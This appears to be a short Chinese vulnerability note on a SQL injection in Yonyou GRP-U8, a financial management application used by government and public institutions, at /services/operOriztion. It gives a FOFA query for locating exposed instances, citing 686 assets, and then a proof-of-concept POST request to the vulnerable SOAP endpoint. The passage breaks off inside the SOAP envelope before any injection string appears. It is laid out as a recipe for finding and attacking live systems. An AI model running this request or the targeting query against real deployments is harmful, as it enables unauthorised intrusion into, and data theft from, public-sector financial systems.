简介
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
漏洞描述
用友GRP-U8是面向政府及行政事业单位的财政管理应用。这个系统在/services/operOriztion发现SQL注入漏洞。
Fofa语法与漏洞编号
FOFA:
app="用友-GRP-U8"
影响资产数量:686
漏洞复现
POC
POST /services/operOriztion HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 477
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/200